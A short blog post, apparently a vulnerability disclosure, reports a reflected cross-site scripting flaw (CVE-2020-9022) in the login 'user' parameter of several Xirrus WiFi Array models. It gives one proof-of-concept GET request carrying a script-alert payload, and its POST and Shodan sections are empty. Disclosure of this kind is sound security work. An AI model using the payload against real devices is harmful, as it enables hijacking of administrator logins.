Friday, January 24, 2020

[Xirrus] - Xirrus WiFi - XSS - (CVE-2020-9022)




                                             



The "Xirrus XR520 WiFi Array/Xirrus XR620 WiFi Array/Xirrus XR2436 WiFi Array/Xirrus XH2-120 WiFi Array" devices are vulnerable to a Cross-Site Scripting Reflected at login, specifically in the "user" parameter.



Affected Devices:
  • Xirrus XR520 WiFi Array
  • Xirrus XR620 WiFi Array
  • Xirrus XR2436 WiFi Array
  • Xirrus XH2-120 WiFi Array



The following java script code is injected into the "user" parameter

GET Request

https://192.x.x.x/cgi-bin/ViewPage.cgi?wmi_login=1&user=admin<script>alert('XSS')</script>&pass=admin&click_to_login=login


POST












Shodan



CVE-2020-9022
By: @Linuxmonr4





Monr4

Autor

0 comentarios:

Post a Comment

 
biz.